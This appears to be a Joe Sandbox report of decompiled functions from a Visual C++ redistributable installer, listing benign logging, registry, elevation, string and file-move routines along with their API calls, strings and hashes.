                                                                          				intOrPtr _t74;
                                                                          				void* _t75;
                                                                          				signed int _t76;
                                                                          				void* _t77;
                                                                          
                                                                          				_t68 = __edx;
                                                                          				_t25 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t25 ^ _t76;
                                                                          				_push(__ebx);
                                                                          				_push(__esi);
                                                                          				_t74 =  *0x7a77c; // 0x76238
                                                                          				_push(__edi);
                                                                          				_v1064 = 0x104;
                                                                          				_v1060 = 0;
                                                                          				_v1056 = 0;
                                                                          				_v1052 = 0;
                                                                          				_t29 = GetModuleFileNameW(0,  &_v528, 0x104);
                                                                          				_t70 = 0x208;
                                                                          				if(_t29 == 0) {
                                                                          					E0003F670(0x208,  &_v528, 0, 0x208);
                                                                          					_t77 = _t77 + 0xc;
                                                                          				}
                                                                          				if(E00054932( &_v528,  &_v1060,  &_v1056) < 0) {
                                                                          					_v1060 = 0;
                                                                          					_v1056 = 0;
                                                                          				}
                                                                          				if(GetComputerNameW( &_v1048,  &_v1064) != 0) {
                                                                          					L7:
                                                                          					E0005858F(_t70, _t83,  &_v1052, 0);
                                                                          					_push(_v1052);
                                                                          					_push("=== Logging started: %ls ===");
                                                                          					_t71 = 2;
                                                                          					_push(_t71);
                                                                          					E0005061A();
                                                                          					_t62 = _v1056;
                                                                          					_push(_t62 & 0x0000ffff);
                                                                          					_push(_t62 >> 0x10);
                                                                          					_t64 = _v1060;
                                                                          					_push(_t64 & 0x0000ffff);
                                                                          					_push(_t64 >> 0x10);
                                                                          					E0005061A(_t71, "Executable: %ls v%d.%d.%d.%d",  &_v528);
                                                                          					E0005061A(_t71, "Computer  : %ls",  &_v1048);
                                                                          					_t46 =  *0x7a778; // 0x3
                                                                          					_t47 = _t46;
                                                                          					if(_t47 == 0) {
                                                                          						_t74 =  *0x7a790; // 0x76264
                                                                          					} else {
                                                                          						_t52 = _t47 - 1;
                                                                          						if(_t52 == 0) {
                                                                          							_t74 =  *0x7a780; // 0x76240
                                                                          						} else {
                                                                          							_t53 = _t52 - 1;
                                                                          							if(_t53 == 0) {
                                                                          								_t74 =  *0x7a784; // 0x76248
                                                                          							} else {
                                                                          								_t54 = _t53 - 1;
                                                                          								if(_t54 == 0) {
                                                                          									_t74 =  *0x7a788; // 0x76254
                                                                          								} else {
                                                                          									if(_t54 == 1) {
                                                                          										_t74 =  *0x7a78c; // 0x7625c
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					E0005061A(_t71, "--- logging level: %hs ---", _t74);
                                                                          					_pop(_t72);
                                                                          					_pop(_t75);
                                                                          					_pop(_t61);
                                                                          					if(_v1052 != 0) {
                                                                          						E000554EF(_v1052);
                                                                          					}
                                                                          					return E0003DE36(_t61, _v8 ^ _t76, _t68, _t72, _t75);
                                                                          				} else {
                                                                          					_t56 =  &_v1048;
                                                                          					do {
                                                                          						 *_t56 = 0;
                                                                          						_t56 = _t56 + 1;
                                                                          						_t70 = _t70 - 1;
                                                                          						_t83 = _t70;
                                                                          					} while (_t70 != 0);
                                                                          					goto L7;
                                                                          				}
                                                                          			}































                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00050234
                                                                          • GetComputerNameW.KERNEL32 ref: 0005028C
                                                                          Strings
                                                                          • --- logging level: %hs ---, xrefs: 0005034C
                                                                          • === Logging started: %ls ===, xrefs: 000502B7
                                                                          • Computer : %ls, xrefs: 000502FA
                                                                          • Executable: %ls v%d.%d.%d.%d, xrefs: 000502E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Name$ComputerFileModule
                                                                          • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                          • API String ID: 2577110986-3153207428
                                                                          • Opcode ID: 281e540511a1e53c7dadeec74054f304a4b578aff2d0a8a931629aaad167f8ad
                                                                          • Instruction ID: 42fda82c59dfa4c7091e6e9f9e23ef85938b636d115a5ed222975b2081a9ef53
                                                                          • Opcode Fuzzy Hash: 281e540511a1e53c7dadeec74054f304a4b578aff2d0a8a931629aaad167f8ad
                                                                          • Instruction Fuzzy Hash: 674174F2E001189BDB609F64DC89AEF77BCEB45301F4041A9FE09A7102D6399E89CF65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 73%
                                                                          			E0005143C(void* _a4, short* _a8, intOrPtr _a12, signed int _a16) {
                                                                          				char* _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				signed int _t43;
                                                                          				signed int _t45;
                                                                          				signed short _t52;
                                                                          				signed int _t62;
                                                                          				signed int _t64;
                                                                          				char* _t65;
                                                                          				signed int _t66;
                                                                          				signed int _t68;
                                                                          				void* _t70;
                                                                          				char* _t74;
                                                                          				signed int _t76;
                                                                          				signed int _t77;
                                                                          				signed int _t78;
                                                                          				signed int _t82;
                                                                          				signed int _t83;
                                                                          
                                                                          				_t64 = _a16;
                                                                          				_t43 = 0;
                                                                          				_v16 = _v16 & 0;
                                                                          				_t74 = 0;
                                                                          				_v8 = 0;
                                                                          				if(_t64 != 0) {
                                                                          					_t66 = 0;
                                                                          					_t45 = 1;
                                                                          					_v12 = 0;
                                                                          					_a16 = 1;
                                                                          					if(_t64 == 0) {
                                                                          						L5:
                                                                          						_t77 = E00011EDE( &_v8, _t45);
                                                                          						if(_t77 < 0) {
                                                                          							L14:
                                                                          							_t74 = _v8;
                                                                          							L15:
                                                                          							if(_t74 != 0) {
                                                                          								E000554EF(_t74);
                                                                          							}
                                                                          							return _t77;
                                                                          						}
                                                                          						_t74 = _v8;
                                                                          						_t78 = 0;
                                                                          						_v12 = 0;
                                                                          						if(_t64 == 0) {
                                                                          							L10:
                                                                          							_t43 = _a16;
                                                                          							_t65 = _t74;
                                                                          							L11:
                                                                          							_push( &_v16);
                                                                          							_t68 = 2;
                                                                          							_push(_t43 * _t68 >> 0x20);
                                                                          							_push(_t43 * _t68);
                                                                          							_t77 = E00016E2E();
                                                                          							if(_t77 < 0) {
                                                                          								goto L15;
                                                                          							}
                                                                          							_t52 = RegSetValueExW(_a4, _a8, 0, 7, _t65, _v16);
                                                                          							if(_t52 != 0) {
                                                                          								_t81 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                          								_t77 =  >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "regutil.cpp", 0x35c, _t77);
                                                                          							}
                                                                          							goto L14;
                                                                          						} else {
                                                                          							goto L7;
                                                                          						}
                                                                          						while(1) {
                                                                          							L7:
                                                                          							_t77 = E00011BEA(_t74, _a16,  *((intOrPtr*)(_a12 + _t78 * 4)));
                                                                          							if(_t77 < 0) {
                                                                          								goto L14;
                                                                          							}
                                                                          							_t82 = _v12;
                                                                          							lstrlenW( *(_a12 + _t82 * 4));
                                                                          							_t74 = _t74 + lstrlenW( *(_a12 + _t82 * 4)) * 2 + 2;
                                                                          							_t78 = _t82 + 1;
                                                                          							_v12 = _t78;
                                                                          							if(_t78 < _t64) {
                                                                          								continue;
                                                                          							}
                                                                          							_t74 = _v8;
                                                                          							goto L10;
                                                                          						}
                                                                          						goto L14;
                                                                          					} else {
                                                                          						goto L3;
                                                                          					}
                                                                          					while(1) {
                                                                          						L3:
                                                                          						_t76 = _t45;
                                                                          						_t83 = _t45;
                                                                          						_t62 = lstrlenW( *(_a12 + _t66 * 4));
                                                                          						_t70 = _a16 + 1 + _t62;
                                                                          						_t45 =  >=  ? _t70 : _t62 | 0xffffffff;
                                                                          						_a16 = _t45;
                                                                          						asm("sbb esi, esi");
                                                                          						_t77 = _t83 & 0x80070216;
                                                                          						if(_t70 < _t76) {
                                                                          							goto L14;
                                                                          						}
                                                                          						_t66 = _v12 + 1;
                                                                          						_v12 = _t66;
                                                                          						if(_t66 < _t64) {
                                                                          							continue;
                                                                          						}
                                                                          						goto L5;
                                                                          					}
                                                                          					goto L14;
                                                                          				}
                                                                          				_t65 = 0x76440;
                                                                          				goto L11;
                                                                          			}






















                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,BundleUpgradeCode,?,00020006,00000000,?,?,?,00000001), ref: 00051479
                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00000001,00000000,00000000,BundleUpgradeCode,?,00020006,00000000,?,?,?,00000001), ref: 000514F1
                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000001), ref: 000514FD
                                                                          • RegSetValueExW.ADVAPI32(00020006,?,00000000,00000007,00000000,?,00000000,?,?,00000000,00000001,00000000,00000000,BundleUpgradeCode,?,00020006), ref: 0005153D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$Value
                                                                          • String ID: BundleUpgradeCode$regutil.cpp
                                                                          • API String ID: 198323757-1648651458
                                                                          • Opcode ID: d0faab18e7d4b043753918eef4405e07d52a08612730d58e6139217810d9cce4
                                                                          • Instruction ID: a6d94f7fe0f3407765f960474b5a5b9dc4eab2edc9726e5328c0c4ecff4a8d4b
                                                                          • Opcode Fuzzy Hash: d0faab18e7d4b043753918eef4405e07d52a08612730d58e6139217810d9cce4
                                                                          • Instruction Fuzzy Hash: 9641D232E0062AAFCF21DFA8C844AEF7BEAEF44711F114129FD05A7251E634DD558B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 21%
                                                                          			E0002D206(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				void* __ecx;
                                                                          				intOrPtr* _t18;
                                                                          				void* _t43;
                                                                          				void* _t57;
                                                                          				intOrPtr _t58;
                                                                          				void* _t60;
                                                                          				void* _t61;
                                                                          				void* _t64;
                                                                          
                                                                          				_v8 = _v8 | 0xffffffff;
                                                                          				_t58 = _a4;
                                                                          				_t18 =  *((intOrPtr*)(_t58 + 0xc8));
                                                                          				_t61 = E0001D58B(_t58 + 0xb8, 1,  *((intOrPtr*)( *_t18 + 0x74))(_t18, _t57, _t60, _t43));
                                                                          				if(_t61 >= 0) {
                                                                          					_push(__ebx);
                                                                          					_t41 = _t58 + 0x4a0;
                                                                          					if(E00024B96(_t58 + 0x4a0, __edx, _t58 + 0x4a0, _t58 + 0x4a4) >= 0) {
                                                                          						if(E00024CE8(_t41, 1,  &_v8) >= 0) {
                                                                          							_push(0x2000000a);
                                                                          							_push(2);
                                                                          							E0001550F();
                                                                          							while(1) {
                                                                          								_t64 = E00024ED2( *((intOrPtr*)(_t58 + 0x49c)), _t41, 1, _a8);
                                                                          								if(_t64 >= 0) {
                                                                          									break;
                                                                          								}
                                                                          								if(_t64 != 0x800704c7) {
                                                                          									L13:
                                                                          									if(_t64 < 0) {
                                                                          										goto L14;
                                                                          									}
                                                                          								} else {
                                                                          									_t64 = 0x80070642;
                                                                          									if(E0001D742(0x80070642,  *((intOrPtr*)(_t58 + 0xc8)), 0, 0, 0x80070642, 0, 0x15, 0) == 4) {
                                                                          										continue;
                                                                          									} else {
                                                                          										L14:
                                                                          										_push("Failed to elevate.");
                                                                          										goto L16;
                                                                          									}
                                                                          								}
                                                                          								goto L17;
                                                                          							}
                                                                          							_push(0x2000000b);
                                                                          							_push(2);
                                                                          							E0001550F();
                                                                          							_t64 = E000252E3(_t41);
                                                                          							if(_t64 < 0) {
                                                                          								_push("Failed to connect to elevated child process.");
                                                                          								goto L16;
                                                                          							} else {
                                                                          								_push(0x2000000c);
                                                                          								_push(2);
                                                                          								E0001550F();
                                                                          								goto L13;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to create pipe and cache pipe.");
                                                                          							goto L16;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to create pipe name and client token.");
                                                                          						L16:
                                                                          						_push(_t64);
                                                                          						E0005012F();
                                                                          					}
                                                                          					L17:
                                                                          				} else {
                                                                          					E000137D3(_t21, "elevation.cpp", 0x100, _t61);
                                                                          					_push("UX aborted elevation requirement.");
                                                                          					_push(_t61);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					CloseHandle(_v8);
                                                                          					_v8 = _v8 & 0x00000000;
                                                                          				}
                                                                          				if(_t64 < 0) {
                                                                          					E00024B2B(_t58 + 0x4a0);
                                                                          				}
                                                                          				return _t64;
                                                                          			}













                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000001,0005B4F0,?,00000001,000000FF,?,?,76B6A770,00000000,00000001,00000000,?,000272F3), ref: 0002D32F
                                                                          Strings
                                                                          • Failed to connect to elevated child process., xrefs: 0002D318
                                                                          • UX aborted elevation requirement., xrefs: 0002D244
                                                                          • Failed to create pipe and cache pipe., xrefs: 0002D28C
                                                                          • Failed to elevate., xrefs: 0002D311
                                                                          • Failed to create pipe name and client token., xrefs: 0002D270
                                                                          • elevation.cpp, xrefs: 0002D23A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                          • API String ID: 2962429428-3003415917
                                                                          • Opcode ID: 49ea958c1ed116fb8da180411aee06e62bb364f23f1d63b05b832b5814928225
                                                                          • Instruction ID: c55c2736b0c35b8d026de1c9d829134a0e9536bc661fb242331040bfdc38db10
                                                                          • Opcode Fuzzy Hash: 49ea958c1ed116fb8da180411aee06e62bb364f23f1d63b05b832b5814928225
                                                                          • Instruction Fuzzy Hash: D831FD72A45732BAE7259660EC46FEF775DDF00721F100117FA09AA1C2DA61EE404296
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 27%
                                                                          			E00012436(signed int __edx, intOrPtr* _a4, short* _a8, signed int _a12, int _a16) {
                                                                          				signed int _t16;
                                                                          				int _t17;
                                                                          				signed int _t18;
                                                                          				signed short _t22;
                                                                          				intOrPtr _t23;
                                                                          				intOrPtr* _t25;
                                                                          				signed short _t28;
                                                                          				int _t31;
                                                                          				short* _t40;
                                                                          				void* _t41;
                                                                          				intOrPtr _t43;
                                                                          				int _t45;
                                                                          				signed int _t48;
                                                                          				int _t50;
                                                                          				int _t52;
                                                                          				intOrPtr* _t53;
                                                                          
                                                                          				_t39 = _a4;
                                                                          				_t45 = __edx | 0xffffffff;
                                                                          				_t16 = _a12;
                                                                          				_t31 = 0;
                                                                          				_t52 = 0;
                                                                          				_t48 = _t16;
                                                                          				if( *_a4 == 0) {
                                                                          					L4:
                                                                          					_t40 = _a8;
                                                                          					if(_t16 != 0) {
                                                                          						if(0 == _t40[_t16]) {
                                                                          							_t48 = _t16 - 1;
                                                                          						}
                                                                          						L11:
                                                                          						_t17 = _t48 + 1;
                                                                          						if(_t52 >= _t17) {
                                                                          							L20:
                                                                          							_t18 = _a12;
                                                                          							_push(_t31);
                                                                          							_push(_t31);
                                                                          							_push(_t52);
                                                                          							_t53 = _a4;
                                                                          							_push( *_t53);
                                                                          							_t41 = 0xffffffff;
                                                                          							_t19 =  ==  ? _t41 : _t18;
                                                                          							if(WideCharToMultiByte(_a16, _t31, _a8,  ==  ? _t41 : _t18, ??, ??, ??, ??) != 0) {
                                                                          								 *(_t48 +  *_t53) = _t31;
                                                                          								L23:
                                                                          								return _t31;
                                                                          							}
                                                                          							_t22 = GetLastError();
                                                                          							_t35 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          							_t23 = 0x80004005;
                                                                          							_t31 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t31);
                                                                          							_push(0x1de);
                                                                          							L7:
                                                                          							_push("strutil.cpp");
                                                                          							E000137D3(_t23);
                                                                          							goto L23;
                                                                          						}
                                                                          						_t52 = _t17;
                                                                          						if(_t52 < 0x7fffffff) {
                                                                          							_t25 = _a4;
                                                                          							_push(1);
                                                                          							_push(_t52);
                                                                          							if( *_t25 == _t31) {
                                                                          								_t23 = E000138D4();
                                                                          							} else {
                                                                          								_push( *_t25);
                                                                          								_t23 = E00013A72();
                                                                          							}
                                                                          							_t43 = _t23;
                                                                          							if(_t43 != 0) {
                                                                          								 *_a4 = _t43;
                                                                          								goto L20;
                                                                          							} else {
                                                                          								_t31 = 0x8007000e;
                                                                          								_push(0x8007000e);
                                                                          								_push(0x1d7);
                                                                          								goto L7;
                                                                          							}
                                                                          						}
                                                                          						_t31 = 0x8007000e;
                                                                          						goto L23;
                                                                          					}
                                                                          					_t50 = WideCharToMultiByte(_a16, _t31, _t40, _t45, _t31, _t31, _t31, _t31);
                                                                          					if(_t50 != 0) {
                                                                          						_t48 = _t50 - 1;
                                                                          						goto L11;
                                                                          					}
                                                                          					_t28 = GetLastError();
                                                                          					_t38 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
                                                                          					_t23 = 0x80004005;
                                                                          					_t31 =  >=  ? 0x80004005 :  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t31);
                                                                          					_push(0x1bc);
                                                                          					goto L7;
                                                                          				}
                                                                          				_t52 = E00013B51( *_t39);
                                                                          				_t45 = _t45 | 0xffffffff;
                                                                          				if(_t52 != _t45) {
                                                                          					_t16 = _t48;
                                                                          					goto L4;
                                                                          				}
                                                                          				_t31 = 0x80070057;
                                                                          				goto L23;
                                                                          			}

                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0004FEE7,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0004FEE7,?,00000000,00000000), ref: 0001247C
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0004FEE7,?,00000000,00000000,0000FDE9), ref: 00012488
                                                                            • Part of subcall function 00013B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B59
                                                                            • Part of subcall function 00013B51: HeapSize.KERNEL32(00000000,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 3662877508-569070560
                                                                          • Opcode ID: 556b0167b3c8f271ef8cf1a19a1b7cbbf5421706bb613dafe030852b1a98cb81
                                                                          • Instruction ID: 3f07d4d370b8b60397779339228b333eff8419a316babeb2d46810fb0453545b
                                                                          • Opcode Fuzzy Hash: 556b0167b3c8f271ef8cf1a19a1b7cbbf5421706bb613dafe030852b1a98cb81
                                                                          • Instruction Fuzzy Hash: 0131BE71200719AFFB209E788CC4AFB32DEEB44364B104229F915DB1A0EB75DCA08764
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 69%
                                                                          			E00033750(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				intOrPtr _t55;
                                                                          				intOrPtr* _t59;
                                                                          				char _t61;
                                                                          				void* _t62;
                                                                          
                                                                          				_t61 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_v20 = 0;
                                                                          				if(_a8 > 0) {
                                                                          					_t59 = _a4 + 8;
                                                                          					do {
                                                                          						if(_a24 == 0) {
                                                                          							if(_a16 == 0) {
                                                                          								L9:
                                                                          								_t36 =  *((intOrPtr*)(_t59 - 4));
                                                                          							} else {
                                                                          								_t36 =  *_t59;
                                                                          								if( *_t59 == 0) {
                                                                          									goto L9;
                                                                          								}
                                                                          							}
                                                                          							_t61 = E000171CF(_a12, _t36,  &_v8, 0);
                                                                          							if(_t61 < 0) {
                                                                          								goto L20;
                                                                          							} else {
                                                                          								goto L11;
                                                                          							}
                                                                          						} else {
                                                                          							if(_a16 == 0) {
                                                                          								L5:
                                                                          								_t44 =  *((intOrPtr*)(_t59 - 4));
                                                                          							} else {
                                                                          								_t44 =  *_t59;
                                                                          								if( *_t59 == 0) {
                                                                          									goto L5;
                                                                          								}
                                                                          							}
                                                                          							_t61 = E000171E9(_a12, _t44,  &_v8, 0);
                                                                          							L11:
                                                                          							if(_t61 < 0) {
                                                                          								L20:
                                                                          								_push("Failed to format property value.");
                                                                          								goto L21;
                                                                          							} else {
                                                                          								_t49 = 0 | _a24 == 0x00000000;
                                                                          								_t61 = E00032FF9(_v8,  &_v12, _a24 == 0);
                                                                          								if(_t61 < 0) {
                                                                          									_push("Failed to escape string.");
                                                                          									goto L21;
                                                                          								} else {
                                                                          									_push(_v12);
                                                                          									_t61 = E00018260(_t49,  &_v16, L" %s%=\"%s\"",  *((intOrPtr*)(_t59 - 8)));
                                                                          									_t62 = _t62 + 0x14;
                                                                          									if(_t61 < 0) {
                                                                          										_push("Failed to format property string part.");
                                                                          										goto L21;
                                                                          									} else {
                                                                          										_t61 = E0001823E(_t49, _a20, _v16, 0);
                                                                          										if(_t61 < 0) {
                                                                          											_push("Failed to append property string part.");
                                                                          											L21:
                                                                          											_push(_t61);
                                                                          											E0005012F();
                                                                          										} else {
                                                                          											goto L15;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						L22:
                                                                          						goto L23;
                                                                          						L15:
                                                                          						_t59 = _t59 + 0xc;
                                                                          						_t55 = _v20 + 1;
                                                                          						_push(0);
                                                                          						_v20 = _t55;
                                                                          						_pop(0);
                                                                          					} while (_t55 < _a8);
                                                                          					goto L22;
                                                                          				}
                                                                          				L23:
                                                                          				E00012793(_v8);
                                                                          				E00012793(_v12);
                                                                          				E00012793(_v16);
                                                                          				return _t61;
                                                                          			}

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 000337B7
                                                                          Strings
                                                                          • Failed to format property string part., xrefs: 00033832
                                                                          • Failed to format property value., xrefs: 00033840
                                                                          • Failed to escape string., xrefs: 00033839
                                                                          • %s%="%s", xrefs: 000337EA
                                                                          • Failed to append property string part., xrefs: 0003382B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16
                                                                          • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                          • API String ID: 3613110473-515423128
                                                                          • Opcode ID: f950661a150ae598639585b01f9f71c472d00f1b8715afa3e83dd4b9029dfc0a
                                                                          • Instruction ID: 9acb1051af2c664bf11bc8de65be40b22c8bf3e922cf8c532479a31f03160ac4
                                                                          • Opcode Fuzzy Hash: f950661a150ae598639585b01f9f71c472d00f1b8715afa3e83dd4b9029dfc0a
                                                                          • Instruction Fuzzy Hash: 0931B3B2905216FFDB269F94CC82EEEB7BDEF00B10F10416AF90166242DB719F509B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 97%
                                                                          			E000540C8(WCHAR* _a4, WCHAR* _a8, intOrPtr _a12, long _a16) {
                                                                          				short _t20;
                                                                          				WCHAR* _t25;
                                                                          				long _t28;
                                                                          				WCHAR* _t29;
                                                                          				signed short _t32;
                                                                          				short* _t34;
                                                                          				short* _t35;
                                                                          
                                                                          				_t25 = _a8;
                                                                          				_t35 = 0;
                                                                          				_t28 =  ==  ? 0 | _a12 != 0x00000000 : 0 | _a12 != 0x00000000 | 0x00000002;
                                                                          				_a16 = _t28;
                                                                          				if(MoveFileExW(_a4, _t25, _t28) != 0) {
                                                                          					L20:
                                                                          					return _t35;
                                                                          				}
                                                                          				_t32 = GetLastError();
                                                                          				if(_a12 != 0 || _t32 != 0x50 && _t32 != 0xb7) {
                                                                          					if(_t32 != 2) {
                                                                          						L8:
                                                                          						if(_t32 != 3) {
                                                                          							L18:
                                                                          							_t35 =  <=  ? _t32 : _t32 & 0x0000ffff | 0x80070000;
                                                                          							goto L19;
                                                                          						}
                                                                          						_t34 = _t35;
                                                                          						_t29 = _t25;
                                                                          						if(( *_t25 & 0x0000ffff) == 0) {
                                                                          							L17:
                                                                          							_t35 = 0x80070003;
                                                                          							goto L19;
                                                                          						}
                                                                          						_push(0x5c);
                                                                          						do {
                                                                          							_t34 =  ==  ? _t29 : _t34;
                                                                          							_t29 =  &(_t29[1]);
                                                                          						} while (( *_t29 & 0x0000ffff) != 0);
                                                                          						if(_t34 == 0) {
                                                                          							goto L17;
                                                                          						}
                                                                          						 *_t34 = 0;
                                                                          						_t35 = E00014013(_t25, _t35);
                                                                          						_t20 = 0x5c;
                                                                          						 *_t34 = _t20;
                                                                          						if(_t35 >= 0 && MoveFileExW(_a4, _t25, _a16) == 0) {
                                                                          							_t35 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
                                                                          							if(_t35 < 0) {
                                                                          								E000137D3(_t22, "fileutil.cpp", 0x4cc, _t35);
                                                                          							}
                                                                          						}
                                                                          						goto L19;
                                                                          					}
                                                                          					if(E00054315(_a4, _t35) == 0) {
                                                                          						goto L18;
                                                                          					}
                                                                          					_t32 = 3;
                                                                          					goto L8;
                                                                          				} else {
                                                                          					_t35 = 1;
                                                                          					L19:
                                                                          					goto L20;
                                                                          				}
                                                                          			}











                                                                          APIs
                                                                          • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,00054203,00000003,00000001,00000001,000007D0,00000003,00000000,?,00029E5F,00000000), ref: 000540ED
                                                                          • GetLastError.KERNEL32(00000001,?,00054203,00000003,00000001,00000001,000007D0,00000003,00000000,?,00029E5F,00000000,000007D0,00000001,00000001,00000003), ref: 000540FC
                                                                          • MoveFileExW.KERNEL32(00000003,00000001,000007D0,00000001,00000000,?,00054203,00000003,00000001,00000001,000007D0,00000003,00000000,?,00029E5F,00000000), ref: 0005417F
                                                                          • GetLastError.KERNEL32(?,00054203,00000003,00000001,00000001,000007D0,00000003,00000000,?,00029E5F,00000000,000007D0,00000001,00000001,00000003,000007D0), ref: 00054189
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
